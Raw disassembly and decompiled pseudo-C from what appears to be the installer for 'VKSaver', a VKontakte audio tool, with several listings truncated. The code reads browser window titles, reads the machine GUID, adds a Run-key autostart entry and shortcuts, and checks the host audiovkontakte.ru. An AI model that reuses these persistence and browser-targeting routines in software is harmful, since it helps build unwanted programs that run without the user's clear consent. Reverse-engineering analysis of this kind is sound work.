sub_403580() {
push ebp
mov ebp, esp
mov eax, 0x5048
call __alloca_probe()
mov eax, [0x46F000]
xor eax, ebp
mov [ebp-0x04], eax
push ebx
push esi
mov ebx, ecx
lea eax, [ebp-0x500C]
push edi
push eax
lea edx, [ebp-0x1004]
lea ecx, [ebp-0x5004]
mov [ebp-0x5008], ebx
mov dword ptr [ebp-0x500C], 0x00
mov dword ptr [0x4B1040], 0x00
call sub_401740()
mov esi, eax
add esp, 0x04
mov [ebp-0x5010], esi
test esi, esi
jz .27
push 0x00
push sub_403320()
mov dword ptr [0x4A103C], 0x00
call [user32.EnumWindows]
xor ebx, ebx
cmp [0x4A103C], ebx
jle .10
jmp .2
.2:
lea eax, [ebp-0x5014]
push eax
push [ebx*4+0x4A1040]
call [user32.GetWindowThreadProcessId]
mov edx, [ebp-0x5014]
mov ecx, esi
lea eax, [ebp-0x5004]
xor esi, esi
.3:
cmp [eax], edx
jz .6
inc esi
add eax, 0x04
dec ecx
jnz .3
.4:
mov edx, [0x4B1040]
.5:
mov esi, [ebp-0x5010]
inc ebx
cmp ebx, [0x4A103C]
jl .2
jmp .11
.6:
test esi, esi
js .4
push 0xFFFFFFF0
push [ebx*4+0x4A1040]
call [user32.GetWindowLongW]
test eax, 0x10000000
jz .4
mov eax, [0x4B1040]
shl eax, 0x09
push 0xFF
add eax, 0x471038
push eax
push [ebx*4+0x4A1040]
call [user32.GetWindowTextW]
mov edx, [0x4B1040]
mov eax, edx
shl eax, 0x09
cmp word ptr [eax+0x471038], 0x00
lea edi, [eax+0x471038]
jz .9
cmp byte ptr [ebp+esi*1-0x1004], 0x10
jnz .8
add edi, 0xFFFFFFFE
jmp .7
.7:
mov ax, [edi+0x02]
add edi, 0x02
test ax, ax
jnz .7
mov ecx, 0x08
mov esi, " - Apple Safari"
rep movsd
.8:
inc edx
mov [0x4B1040], edx
.9:
cmp edx, 0xFF
jnl .11
jmp .5
.10:
mov edx, [0x4B1040]
.11:
test edx, edx
jnz .28
mov ebx, [ebp-0x500C]
test bl, 0x01
jz .13
xor ecx, ecx
jmp .12
.12:
movzx eax, word ptr [ecx+"Microsoft Internet Explorer"]
mov [ecx+0x471038], ax
lea ecx, [ecx+0x02]
test ax, ax
jnz .12
mov edx, 0x01
mov [0x4B1040], edx
.13:
test bl, 0x02
jz .15
mov eax, edx
mov ecx, "Mozilla Firefox"
shl eax, 0x09
sub eax, ecx
lea esi, [eax+0x471038]
jmp .14
.14:
movzx eax, word ptr [ecx]
mov [esi+ecx*1], ax
lea ecx, [ecx+0x02]
test ax, ax
jnz .14
inc edx
mov [0x4B1040], edx
.15:
test bl, 0x04
jz .17
mov eax, edx
mov ecx, "Opera browser"
shl eax, 0x09
sub eax, ecx
lea esi, [eax+0x471038]
lea ecx, [ecx]
.16:
movzx eax, word ptr [ecx]
mov [esi+ecx*1], ax
lea ecx, [ecx+0x02]
test ax, ax
jnz .16
inc edx
mov [0x4B1040], edx
.17:
test bl, 0x08
jz .19
mov eax, edx
mov ecx, "Google Chrome"
shl eax, 0x09
sub eax, ecx
lea esi, [eax+0x471038]
lea ecx, [ecx]
.18:
movzx eax, word ptr [ecx]
mov [esi+ecx*1], ax
lea ecx, [ecx+0x02]
test ax, ax
jnz .18
inc edx
mov [0x4B1040], edx
.19:
test bl, 0x10
jz .21
mov eax, edx
mov ecx, "Apple Safari"
shl eax, 0x09
sub eax, ecx
lea esi, [eax+0x471038]
lea ecx, [ecx]
.20:
movzx eax, word ptr [ecx]
mov [esi+ecx*1], ax
lea ecx, [ecx+0x02]
test ax, ax
jnz .20
inc edx
mov [0x4B1040], edx
.21:
test bl, 0x20
jz .23
mov eax, edx
mov ecx, "Yandex browser"
shl eax, 0x09
sub eax, ecx
lea esi, [eax+0x471038]
lea ecx, [ecx]
.22:
movzx eax, word ptr [ecx]
mov [esi+ecx*1], ax
lea ecx, [ecx+0x02]
test ax, ax
jnz .22
inc edx
mov [0x4B1040], edx
.23:
test bl, 0x40
jz .25
mov eax, edx
mov ecx, "Maxthon browser"
shl eax, 0x09
sub eax, ecx
lea esi, [eax+0x471038]
lea ecx, [ecx]
.24:
movzx eax, word ptr [ecx]
mov [esi+ecx*1], ax
lea ecx, [ecx+0x02]
test ax, ax
jnz .24
inc edx
mov [0x4B1040], edx
.25:
mov ebx, [ebp-0x5008]
.26:
; listing truncated
/* DISPLAY WARNING: Type casts are NOT being printed */
void sub_403580(void)
{
int16_t iVar1;
code *pcVar2;
int32_t iVar3;
uint32_t *puVar4;
uint32_t uVar5;
int16_t *piVar6;
int32_t iVar7;
int32_t iVar8;
undefined4 *puVar9;
undefined4 *puVar10;
uint32_t uStack_504c;
int32_t iStack_5048;
int32_t iStack_5038;
uint32_t uStack_5018;
int32_t iStack_5014;
uint32_t auStack_5010 [2];
uint32_t auStack_5008 [4096];
char acStack_1008 [4068];
undefined4 uStack_24;
undefined4 uStack_20;
uint32_t *puStack_1c;
code *pcStack_18;
uint32_t *puStack_14;
__alloca_probe();
puStack_14 = auStack_5010;
auStack_5010[0] = 0;
[0x0x4b1040] = 0;
pcStack_18 = 0x4035ce;
iVar3 = sub_401740();
iStack_5014 = iVar3;
if (iVar3 != 0) {
puStack_14 = 0x0;
pcStack_18 = sub_403320;
[0x0x4a103c] = 0;
puStack_1c = 0x4035f8;
(*user32.EnumWindows)();
iVar7 = 0;
if (0 < [0x0x4a103c]) {
code_r0x00403610:
puStack_14 = &uStack_5018;
pcStack_18 = *(iVar7 * 4 + 0x4a1040);
puStack_1c = 0x403624;
(*user32.GetWindowThreadProcessId)();
puVar4 = auStack_5008;
iVar8 = 0;
code_r0x00403634:
if (*puVar4 != uStack_5018) goto code_r0x00403638;
if (-1 < iVar8) {
puStack_14 = 0xfffffff0;
pcStack_18 = *(iVar7 * 4 + 0x4a1040);
puStack_1c = 0x40366c;
uVar5 = (*user32.GetWindowLongW)();
if ((uVar5 & 0x10000000) != 0) {
puStack_14 = 0xff;
pcStack_18 = [0x0x4b1040] * 0x200 + 0x471038;
puStack_1c = *(iVar7 * 4 + 0x4a1040);
uStack_20 = 0x403693;
(*user32.GetWindowTextW)();
if (*([0x0x4b1040] * 0x200 + 0x471038) != 0) {
if (acStack_1008[iVar8] == '\x10') {
puVar10 = [0x0x4b1040] * 0x200 + 0x471036;
do {
piVar6 = puVar10 + 2;
puVar10 = puVar10 + 2;
} while (*piVar6 != 0);
puVar9 = " - Apple Safari";
for (iVar3 = 8; iVar3 != 0; iVar3 = iVar3 + -1) {
*puVar10 = *puVar9;
puVar9 = puVar9 + 1;
puVar10 = puVar10 + 1;
}
}
004b1040 = [0x0x4b1040] + 1;
}
if (0xfe < [0x0x4b1040]) goto code_r0x004036f2;
}
}
goto code_r0x00403645;
}
code_r0x004036f2:
if ([0x0x4b1040] != 0) goto code_r0x00403886;
if ((auStack_5010[0] & 1) != 0) {
iVar3 = 0;
do {
piVar6 = iVar3 + "Microsoft Internet Explorer";
*(iVar3 + 0x471038) = *piVar6;
iVar3 = iVar3 + 2;
} while (*piVar6 != 0);
[0x0x4b1040] = 1;
}
if ((auStack_5010[0] & 2) != 0) {
piVar6 = "Mozilla Firefox";
do {
iVar1 = *piVar6;
piVar6[[0x0x4b1040] * 0x100 + 0x2cbe] = iVar1;
piVar6 = piVar6 + 1;
} while (iVar1 != 0);
004b1040 = [0x0x4b1040] + 1;
}
if ((auStack_5010[0] & 4) != 0) {
piVar6 = "Opera browser";
do {
iVar1 = *piVar6;
piVar6[[0x0x4b1040] * 0x100 + 0x2cae] = iVar1;
piVar6 = piVar6 + 1;
} while (iVar1 != 0);
004b1040 = [0x0x4b1040] + 1;
}
if ((auStack_5010[0] & 8) != 0) {
piVar6 = "Google Chrome";
do {
iVar1 = *piVar6;
piVar6[[0x0x4b1040] * 0x100 + 0x2ca0] = iVar1;
piVar6 = piVar6 + 1;
} while (iVar1 != 0);
004b1040 = [0x0x4b1040] + 1;
}
if ((auStack_5010[0] & 0x10) != 0) {
piVar6 = "Apple Safari";
do {
iVar1 = *piVar6;
piVar6[[0x0x4b1040] * 0x100 + 0x2c92] = iVar1;
piVar6 = piVar6 + 1;
} while (iVar1 != 0);
004b1040 = [0x0x4b1040] + 1;
}
if ((auStack_5010[0] & 0x20) != 0) {
piVar6 = "Yandex browser";
do {
iVar1 = *piVar6;
piVar6[[0x0x4b1040] * 0x100 + 0x2c84] = iVar1;
piVar6 = piVar6 + 1;
} while (iVar1 != 0);
004b1040 = [0x0x4b1040] + 1;
}
if ((auStack_5010[0] & 0x40) != 0) {
piVar6 = "Maxthon browser";
do {
iVar1 = *piVar6;
piVar6[[0x0x4b1040] * 0x100 + 0x2c74] = iVar1;
piVar6 = piVar6 + 1;
} while (iVar1 != 0);
004b1040 = [0x0x4b1040] + 1;
}
}
if ([0x0x4b1040] == 0) {
[0x0x4b1044] = [0x0x4b1044] + 1;
puStack_14 = 0x40386d;
sub_404410();
sub_406beb();
return;
}
code_r0x00403886:
pcVar2 = user32.SendMessageW;
if ([0x0x4b1040] != [0x0x4b2018]) {
puStack_14 = 0x0;
pcStack_18 = 0x0;
puStack_1c = 0x1009;
uStack_20 = [0x0x4b1448];
uStack_24 = 0x4038af;
004b2018 = [0x0x4b1040];
(*user32.SendMessageW)();
iVar3 = 0;
if (0 < [0x0x4b1040]) {
iVar7 = 0x471038;
do {
puStack_14 = 0x34;
puStack_1c = &uStack_504c;
pcStack_18 = 0x0;
uStack_20 = 0x4038d0;
_memset();
puStack_14 = &uStack_504c;
pcStack_18 = 0x0;
puStack_1c = 0x104d;
uStack_20 = [0x0x4b1448];
uStack_504c = 1;
uStack_24 = 0x4038ff;
iStack_5048 = iVar3;
iStack_5038 = iVar7;
(*pcVar2)();
iVar3 = iVar3 + 1;
iVar7 = iVar7 + 0x200;
} while (iVar3 < [0x0x4b1040]);
}
}
sub_406beb();
return;
code_r0x00403638:
iVar8 = iVar8 + 1;
puVar4 = puVar4 + 1;
iVar3 = iVar3 + -1;
if (iVar3 == 0) goto code_r0x00403645;
goto code_r0x00403634;
code_r0x00403645:
iVar7 = iVar7 + 1;
iVar3 = iStack_5014;
if ([0x0x4a103c] <= iVar7) goto code_r0x004036f2;
goto code_r0x00403610;
}
0x402CE0 sub_402ce0 str 23 api 9 imm 28 Unknown
sub_402ce0() {
push ebp
mov ebp, esp
mov eax, 0x1514
call __alloca_probe()
mov eax, [0x46F000]
xor eax, ebp
mov [ebp-0x04], eax
push ebx
push esi
push edi
lea eax, [ebp-0x1510]
push eax
push 0x101
push 0x00
push "SOFTWARE\\Microsoft\\Cryptography"
push 0x80000002
mov [ebp-0x150A], dl
mov [ebp-0x1509], cl
call [advapi32.RegOpenKeyExA]
test eax, eax
jnz .15
lea eax, [ebp-0x1514]
push eax
push 0x4B14CC
push 0x00
push 0x00
xorps xmm0, xmm0
push "MachineGuid"
push [ebp-0x1510]
mov dword ptr [ebp-0x1514], 0x28
movq [0x4B14CC], xmm0
movq [0x4B14D4], xmm0
movq [0x4B14DC], xmm0
movq [0x4B14E4], xmm0
movq [0x4B14EC], xmm0
call [advapi32.RegQueryValueExA]
push [ebp-0x1510]
mov edi, [advapi32.RegCloseKey]
call edi
mov esi, 0x4B14CC
xor ebx, ebx
.1:
cmp byte ptr [esi], 0x2D
jnz .2
inc esi
.2:
mov dl, [esi]
inc esi
xor al, al
lea ecx, [edx-0x30]
cmp cl, 0x09
jnbe .3
mov al, dl
sub al, 0x30
jmp .6
.3:
cmp dl, 0x61
jl .4
cmp dl, 0x66
jle .5
.4:
lea ecx, [edx-0x41]
cmp cl, 0x05
jnbe .6
.5:
mov al, dl
and al, 0x0F
add al, 0x09
.6:
mov ecx, ebx
test bl, 0x01
jz .7
shr ecx, 0x01
or [ecx+0x4B14BC], al
jmp .8
.7:
shl al, 0x04
shr ecx, 0x01
mov [ecx+0x4B14BC], al
.8:
inc ebx
cmp ebx, 0x20
jl .1
call sub_402360()
test al, al
jz .15
cmp byte ptr [0x4B14BA], 0x00
jz .9
call sub_4029b0()
.9:
call sub_401fa0()
test al, al
jz .15
lea eax, [ebp-0x1510]
push eax
push 0x03
push 0x00
push "Software\\Microsoft\\Windows\\CurrentVersion\\Run"
push 0x80000002
call [advapi32.RegOpenKeyExW]
test eax, eax
jnz .11
mov ecx, 0x4B1A10
lea edx, [ecx+0x02]
lea esp, [esp]
.10:
mov ax, [ecx]
add ecx, 0x02
test ax, ax
jnz .10
sub ecx, edx
sar ecx, 0x01
lea eax, [ecx*2+0x02]
push eax
push 0x4B1A10
push 0x01
push 0x00
push "VKSaver"
push [ebp-0x1510]
call [advapi32.RegSetValueExW]
push [ebp-0x1510]
call edi
.11:
mov esi, [shell32.SHGetSpecialFolderPathW]
push 0x00
push 0x18
lea eax, [ebp-0x208]
push eax
push 0x00
call esi
push "\\VKSaver.lnk"
lea eax, [ebp-0x208]
push 0x100
push eax
call _wcscat_s()
mov edi, [kernel32.DeleteFileW]
add esp, 0x0C
lea eax, [ebp-0x208]
push eax
call edi
push 0x00
push 0x17
lea eax, [ebp-0x208]
push eax
push 0x00
call esi
push "\\VKSaver"
lea eax, [ebp-0x208]
push 0x100
push eax
call _wcscat_s()
add esp, 0x0C
lea eax, [ebp-0x208]
push 0x00
push eax
call [kernel32.CreateDirectoryW]
mov esi, [user32.wsprintfW]
push "VKSaver.lnk"
lea eax, [ebp-0x208]
push eax
lea eax, [ebp-0x408]
push "%s\\%s"
push eax
call esi
add esp, 0x10
lea eax, [ebp-0x408]
push eax
call edi
push "Launch VKSaver.lnk"
lea eax, [ebp-0x208]
push eax
lea eax, [ebp-0x408]
push "%s\\%s"
push eax
call esi
push 0xFFFFFF95
lea eax, [ebp-0x408]
push 0x46B100
push eax
mov edx, 0x46B4AC
mov ecx, 0x4B1A10
call sub_402b60()
add esp, 0x1C
lea eax, [ebp-0x208]
push "Readme.lnk"
push eax
lea eax, [ebp-0x408]
push "%s\\%s"
push eax
call esi
push 0xFFFFFF77
lea eax, [ebp-0x408]
push 0x46B100
push eax
mov edx, 0x46B4E8
mov ecx, 0x4B1610
call sub_402b60()
add esp, 0x1C
lea eax, [ebp-0x208]
push "Uninstall.lnk"
push eax
push "%s\\%s"
lea eax, [ebp-0x408]
push eax
call esi
push 0xFFFFFF78
lea eax, [ebp-0x408]
push "-uninstall"
push eax
mov edx, 0x46B540
mov ecx, 0x4B1A10
call sub_402b60()
add esp, 0x1C
lea eax, [ebp-0x508]
push 0x100
push eax
call [kernel32.GetSystemDirectoryA]
push "\\operaprefs_fixed.ini"
lea eax, [ebp-0x508]
; listing truncated
/* DISPLAY WARNING: Type casts are NOT being printed */
void sub_402ce0(void)
{
uint8_t *puVar1;
code *pcVar2;
code *pcVar3;
int16_t *piVar4;
uint8_t uVar5;
char cVar6;
uint8_t uVar7;
int32_t iVar8;
int16_t *piVar9;
char extraout_DL;
uint32_t uVar10;
uint8_t *puVar11;
undefined4 uStack_1518;
undefined4 uStack_1514;
char cStack_150e;
char acStack_150c [4096];
undefined auStack_50c [256];
undefined auStack_40c [512];
undefined auStack_20c [368];
undefined4 uStack_9c;
undefined4 uStack_98;
char *pcStack_94;
char *pcStack_90;
undefined *puStack_8c;
undefined4 uStack_88;
undefined *puStack_84;
undefined4 uStack_80;
char *pcStack_7c;
undefined *puStack_78;
undefined *puStack_74;
undefined *puStack_70;
undefined *puStack_6c;
undefined *puStack_68;
undefined *puStack_64;
undefined4 uStack_60;
undefined4 uStack_5c;
undefined *puStack_58;
undefined *puStack_54;
undefined4 uStack_50;
undefined *puStack_4c;
undefined4 uStack_48;
undefined *puStack_44;
undefined4 uStack_40;
int32_t iStack_3c;
undefined4 uStack_38;
undefined4 uStack_34;
undefined4 uStack_30;
undefined4 uStack_2c;
undefined4 *puStack_28;
undefined4 uStack_24;
undefined4 uStack_20;
undefined4 uStack_1c;
undefined4 uStack_18;
undefined4 *puStack_14;
__alloca_probe();
puStack_14 = &uStack_1514;
uStack_18 = 0x101;
uStack_1c = 0;
uStack_20 = "SOFTWARE\\Microsoft\\Cryptography";
uStack_24 = 0x80000002;
puStack_28 = 0x402d24;
cStack_150e = extraout_DL;
iVar8 = (*advapi32.RegOpenKeyExA)();
if (iVar8 == 0) {
puStack_28 = &uStack_1518;
uStack_2c = 0x4b14cc;
uStack_30 = 0;
uStack_34 = 0;
uStack_38 = "MachineGuid";
iStack_3c = uStack_1514;
uStack_1518 = 0x28;
[0x0x4b14cc] = 0;
[0x0x4b14d4] = 0;
[0x0x4b14dc] = 0;
[0x0x4b14e4] = 0;
[0x0x4b14ec] = 0;
uStack_40 = 0x402d82;
(*advapi32.RegQueryValueExA)();
pcVar2 = advapi32.RegCloseKey;
uStack_40 = uStack_1514;
puStack_44 = 0x402d90;
(*advapi32.RegCloseKey)();
puVar11 = 0x4b14cc;
uVar10 = 0;
do {
if (*puVar11 == 0x2d) {
puVar11 = puVar11 + 1;
}
uVar7 = *puVar11;
puVar11 = puVar11 + 1;
uVar5 = 0;
if (uVar7 - 0x30 < 10) {
uVar5 = uVar7 - 0x30;
}
else if ((('`' < uVar7) && (uVar7 < 'g')) || (uVar7 + 0xbf < 6)) {
uVar5 = (uVar7 & 0xf) + 9;
}
if ((uVar10 & 1) == 0) {
*((uVar10 >> 1) + 0x4b14bc) = uVar5 << 4;
}
else {
puVar1 = (uVar10 >> 1) + 0x4b14bc;
*puVar1 = *puVar1 | uVar5;
}
uVar10 = uVar10 + 1;
} while (uVar10 < 0x20);
puStack_44 = 0x402def;
cVar6 = sub_402360();
if (cVar6 != '\0') {
if ([0x0x4b14ba] != '\0') {
puStack_28 = 0x402e05;
sub_4029b0();
}
puStack_28 = 0x402e0a;
cVar6 = sub_401fa0();
if (cVar6 != '\0') {
puStack_28 = &uStack_1514;
uStack_2c = 3;
uStack_30 = 0;
uStack_34 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";
uStack_38 = 0x80000002;
iStack_3c = 0x402e2d;
iVar8 = (*advapi32.RegOpenKeyExW)();
if (iVar8 == 0) {
piVar4 = 0x4b1a10;
do {
piVar9 = piVar4;
piVar4 = piVar9 + 1;
} while (*piVar9 != 0);
iStack_3c = (piVar9 + -0x258d08 >> 1) * 2 + 2;
uStack_40 = 0x4b1a10;
puStack_44 = 0x1;
uStack_48 = 0;
puStack_4c = "VKSaver";
uStack_50 = uStack_1514;
puStack_54 = 0x402e71;
(*advapi32.RegSetValueExW)();
puStack_54 = uStack_1514;
puStack_58 = 0x402e79;
(*pcVar2)();
}
pcVar3 = shell32.SHGetSpecialFolderPathW;
iStack_3c = 0;
uStack_40 = 0x18;
puStack_44 = auStack_20c;
uStack_48 = 0;
puStack_4c = 0x402e8e;
(*shell32.SHGetSpecialFolderPathW)();
puStack_4c = "\\VKSaver.lnk";
puStack_54 = auStack_20c;
uStack_50 = 0x100;
puStack_58 = 0x402ea4;
_wcscat_s();
pcVar2 = kernel32.DeleteFileW;
puStack_4c = auStack_20c;
uStack_50 = 0x402eb6;
(*kernel32.DeleteFileW)();
uStack_50 = 0;
puStack_54 = 0x17;
puStack_58 = auStack_20c;
uStack_5c = 0;
uStack_60 = 0x402ec5;
(*pcVar3)();
uStack_60 = "\\VKSaver";
puStack_68 = auStack_20c;
puStack_64 = 0x100;
puStack_6c = 0x402edb;
_wcscat_s();
puStack_64 = auStack_20c;
uStack_60 = 0;
puStack_68 = 0x402eed;
(*kernel32.CreateDirectoryW)();
pcVar3 = user32.wsprintfW;
puStack_68 = "VKSaver.lnk";
puStack_6c = auStack_20c;
puStack_74 = auStack_40c;
puStack_70 = "%s\\%s";
puStack_78 = 0x402f0d;
(*user32.wsprintfW)();
puStack_68 = auStack_40c;
puStack_6c = 0x402f19;
(*pcVar2)();
puStack_6c = "Launch VKSaver.lnk";
puStack_70 = auStack_20c;
puStack_78 = auStack_40c;
puStack_74 = "%s\\%s";
pcStack_7c = 0x402f33;
(*pcVar3)();
pcStack_7c = 0xffffff95;
puStack_84 = auStack_40c;
uStack_80 = 0x46b100;
uStack_88 = 0x402f50;
sub_402b60();
puStack_70 = auStack_20c;
puStack_6c = "Readme.lnk";
puStack_78 = auStack_40c;
puStack_74 = "%s\\%s";
pcStack_7c = 0x402f6d;
(*pcVar3)();
pcStack_7c = 0xffffff77;
puStack_84 = auStack_40c;
uStack_80 = 0x46b100;
uStack_88 = 0x402f8d;
sub_402b60();
puStack_70 = auStack_20c;
puStack_6c = "Uninstall.lnk";
puStack_74 = "%s\\%s";
puStack_78 = auStack_40c;
pcStack_7c = 0x402faa;
(*pcVar3)();
pcStack_7c = 0xffffff78;
puStack_84 = auStack_40c;
uStack_80 = "-uninstall";
/* listing truncated */0x4064E0 sub_4064e0 str 13 api 38 imm 29 Unknown
sub_4064e0() {
push ebp
mov ebp, esp
and esp, 0xFFFFFFF0
mov eax, 0x1A68
call __alloca_probe()
mov eax, [0x46F000]
xor eax, esp
mov [esp+0x1A64], eax
push esi
push edi
push "VKSaverInstallerMtx"
push 0x00
push 0x100000
call [kernel32.OpenMutexW]
mov [0x4B14F4], eax
test eax, eax
jz .2
push eax
call [kernel32.CloseHandle]
push 0x00
push "VKSaverInstallWnd"
call [user32.FindWindowW]
mov esi, eax
test esi, esi
jz .1
push 0x01
push esi
call [user32.ShowWindow]
push esi
call [user32.SetForegroundWindow]
.1:
mov eax, 0x01
pop edi
pop esi
mov ecx, [esp+0x1A64]
xor ecx, esp
call sub_406beb()
mov esp, ebp
pop ebp
ret 0x10
.2:
push "VKSaverInstallerMtx"
push 0x01
push 0x00
call [kernel32.CreateMutexW]
mov [0x4B14F4], eax
lea eax, [esp+0x4D8]
push eax
push 0x202
call [ws2_32.WSAStartup]
test eax, eax
jnz .29
mov esi, [ws2_32.GetAddrInfoW]
lea eax, [esp+0x20]
push eax
lea eax, [esp+0x34]
push eax
xorps xmm0, xmm0
movdqa [esp+0x38], xmm0
push 0x46D578
push "audiovkontakte.ru"
movdqa [esp+0x50], xmm0
mov dword ptr [esp+0x44], 0x02
mov dword ptr [esp+0x48], 0x02
mov dword ptr [esp+0x4C], 0x11
call esi
test eax, eax
jz .4
jmp .3
.3:
push 0x25
push 0x46D5A4
push 0x46D5D8
push 0x00
call [user32.MessageBoxW]
cmp eax, 0x02
jz .6
lea eax, [esp+0x20]
push eax
lea eax, [esp+0x34]
push eax
xorps xmm0, xmm0
movdqa [esp+0x38], xmm0
push 0x46D578
push "audiovkontakte.ru"
movdqa [esp+0x50], xmm0
mov dword ptr [esp+0x44], 0x02
mov dword ptr [esp+0x48], 0x02
mov dword ptr [esp+0x4C], 0x11
call esi
test eax, eax
jnz .3
.4:
push [esp+0x20]
call [ws2_32.FreeAddrInfoW]
push 0x00
push 0x02
call [kernel32.CreateToolhelp32Snapshot]
push 0x228
mov edi, eax
lea eax, [esp+0x2B0]
push 0x00
push eax
call _memset()
add esp, 0x0C
mov dword ptr [esp+0x2A8], 0x22C
call [kernel32.GetCurrentProcessId]
mov esi, eax
lea eax, [esp+0x2A8]
push eax
push edi
mov [esp+0x1C], esi
mov dword ptr [esp+0x24], 0x00
call [kernel32.Process32FirstW]
test eax, eax
jz .8
lea ecx, [ecx]
.5:
cmp [esp+0x2B0], esi
jz .7
lea eax, [esp+0x2A8]
push eax
push edi
call [kernel32.Process32NextW]
test eax, eax
jnz .5
jmp .8
.6:
mov eax, 0x02
pop edi
pop esi
mov ecx, [esp+0x1A64]
xor ecx, esp
call sub_406beb()
mov esp, ebp
pop ebp
ret 0x10
.7:
mov eax, [esp+0x2C0]
mov [esp+0x1C], eax
.8:
push edi
call [kernel32.CloseHandle]
push 0x200
lea eax, [esp+0x66C]
push eax
push 0x00
call [kernel32.GetModuleFileNameW]
lea eax, [esp+0x54]
push eax
lea eax, [esp+0x66C]
push eax
call [version.GetFileVersionInfoSizeW]
mov esi, eax
lea ecx, [esi+0x04]
push ecx
push 0x01
call _calloc()
add esp, 0x08
mov edi, eax
push edi
push esi
push 0x00
lea eax, [esp+0x674]
push eax
call [version.GetFileVersionInfoW]
lea eax, [esp+0x2C]
push eax
lea eax, [esp+0x28]
push eax
push 0x46B11C
push edi
mov dword ptr [esp+0x34], 0x00
call [version.VerQueryValueW]
mov eax, [esp+0x24]
mov esi, [esp+0x2C]
test eax, eax
cmovnz esi, eax
movzx eax, word ptr [esi+0x0C]
mov [esp+0x28], eax
movzx eax, word ptr [esi+0x0A]
mov [0x4B14FC], eax
movzx eax, word ptr [esi+0x08]
mov [0x4B1500], eax
mov edx, [esi+0x0C]
mov ecx, edx
shr ecx, 0x19
imul ecx, ecx, 0x64
mov eax, edx
shr eax, 0x15
and eax, 0x0F
add ecx, eax
imul ecx, ecx, 0x64
shr edx, 0x10
and edx, 0x1F
add ecx, edx
mov [0x4B1504], ecx
movzx eax, word ptr [esi+0x0C]
mov [0x4B1508], eax
mov ecx, [esi+0x0C]
mov edx, [esi+0x08]
mov eax, ecx
shr eax, 0x19
add eax, 0x7D0
push eax
mov eax, ecx
shr eax, 0x15
and eax, 0x0F
push eax
mov eax, ecx
shr eax, 0x10
and eax, 0x1F
push eax
movzx eax, cx
push eax
movzx eax, dx
push eax
shr edx, 0x10
push edx
; listing truncated
/* DISPLAY WARNING: Type casts are NOT being printed */
void sub_4064e0(void)
{
code *pcVar1;
int32_t iVar2;
char cVar3;
uint8_t uVar4;
int32_t iVar5;
int32_t iVar6;
int32_t iVar7;
int16_t *piVar8;
int16_t *piVar9;
undefined *puVar10;
uint32_t uVar11;
uint32_t uVar12;
int32_t in_stack_00000264;
int16_t in_stack_000005d4;
undefined *puStack_58;
undefined4 uStack_54;
undefined4 uStack_50;
undefined4 uStack_4c;
undefined4 uStack_48;
int32_t iStack_44;
undefined *puStack_40;
undefined *puStack_3c;
int32_t iStack_38;
undefined **ppuStack_34;
undefined4 uStack_30;
undefined4 uStack_2c;
undefined auStack_28 [8];
undefined8 uStack_20;
undefined auStack_8 [4];
__alloca_probe();
uStack_20._0_4_ = 0;
uStack_20._4_4_ = "VKSaverInstallerMtx";
auStack_28 = 0x10000000000000;
auStack_28._0_4_ = 0x406512;
004b14f4 = (*kernel32.OpenMutexW)();
if (004b14f4 != 0) {
auStack_28._0_4_ = 004b14f4;
uStack_2c = 0x406522;
(*kernel32.CloseHandle)();
uStack_2c = 0;
uStack_30 = "VKSaverInstallWnd";
ppuStack_34 = 0x40652f;
iVar5 = (*user32.FindWindowW)();
if (iVar5 != 0) {
ppuStack_34 = 0x1;
puStack_3c = 0x40653e;
iStack_38 = iVar5;
(*user32.ShowWindow)();
puStack_40 = 0x406545;
puStack_3c = iVar5;
(*user32.SetForegroundWindow)();
}
uStack_2c = 0x40655a;
sub_406beb();
return;
}
auStack_28._0_4_ = "VKSaverInstallerMtx";
uStack_2c = 1;
uStack_30 = 0;
ppuStack_34 = 0x40656f;
004b14f4 = (*kernel32.CreateMutexW)();
ppuStack_34 = &stack0x000004a8;
iStack_38 = 0x202;
puStack_3c = 0x406587;
iVar5 = (*ws2_32.WSAStartup)();
pcVar1 = ws2_32.GetAddrInfoW;
if (iVar5 != 0) goto code_r0x00406bd3;
puStack_3c = &stack0xffffffe8;
puStack_40 = auStack_8;
iStack_44 = 0x46d578;
uStack_48 = "audiovkontakte.ru";
uStack_4c = 0x4065d2;
iVar5 = (*ws2_32.GetAddrInfoW)();
while (iVar5 != 0) {
uStack_4c = 0x25;
uStack_50 = 0x46d5a4;
uStack_54 = 0x46d5d8;
puStack_58 = 0x0;
iVar5 = (*user32.MessageBoxW)();
if (iVar5 == 2) {
uStack_54 = 0x4066d3;
sub_406beb();
return;
}
uStack_20._0_4_ = 2;
auStack_28 = 0x200000000;
uStack_20._4_4_ = 0x11;
iVar5 = (*pcVar1)();
}
uStack_4c = auStack_28._0_4_;
uStack_50 = 0x406648;
(*ws2_32.FreeAddrInfoW)();
uStack_50 = 0;
uStack_54 = 2;
puStack_58 = 0x406652;
(*kernel32.CreateToolhelp32Snapshot)();
puStack_58 = 0x228;
_memset();
iVar5 = 0x22c;
puStack_58 = 0x40667c;
iVar6 = (*kernel32.GetCurrentProcessId)();
puStack_58 = &stack0x00000254;
iStack_38 = 0;
puStack_40 = iVar6;
iVar7 = (*kernel32.Process32FirstW)();
while ((iVar2 = puStack_40, iVar7 != 0 && (iVar2 = in_stack_00000264, iVar5 != iVar6))) {
iVar7 = (*kernel32.Process32NextW)();
}
puStack_40 = iVar2;
(*kernel32.CloseHandle)();
(*kernel32.GetModuleFileNameW)();
(*version.GetFileVersionInfoSizeW)();
iVar5 = _calloc();
(*version.GetFileVersionInfoW)();
(*version.VerQueryValueW)();
puVar10 = &stack0x00000608;
if (&stack0xffffffe8 != 0x0) {
puVar10 = &stack0xffffffe8;
}
004b14fc = *(puVar10 + 10);
004b1500 = *(puVar10 + 8);
uVar11 = *(puVar10 + 0xc);
004b1504 = ((uVar11 >> 0x19) * 100 + (uVar11 >> 0x15 & 0xf)) * 100 + (uVar11 >> 0x10 & 0x1f);
004b1508 = *(puVar10 + 0xc);
(*user32.wsprintfW)();
piVar8 = &stack0x000005d4;
while (in_stack_000005d4 != 0) {
if (*piVar8 == 0x2e) {
*piVar8 = 0;
}
piVar8 = piVar8 + 1;
in_stack_000005d4 = *piVar8;
}
cVar3 = sub_406090();
if (((cVar3 == '\0') || (cVar3 = sub_406240(), cVar3 == '\0')) && (iVar5 != 0)) {
sub_403120();
uVar11 = 1;
(*kernel32.CreateToolhelp32Snapshot)();
_memset();
iStack_44 = 0x22c;
iVar5 = (*kernel32.Process32FirstW)();
while (iVar5 != 0) {
if ((iStack_44 != 0x46b11c) && (&puStack_58 == ppuStack_34)) {
*(&stack0x000009c4 + uVar11 * 4) = iStack_44;
uVar11 = uVar11 + 1;
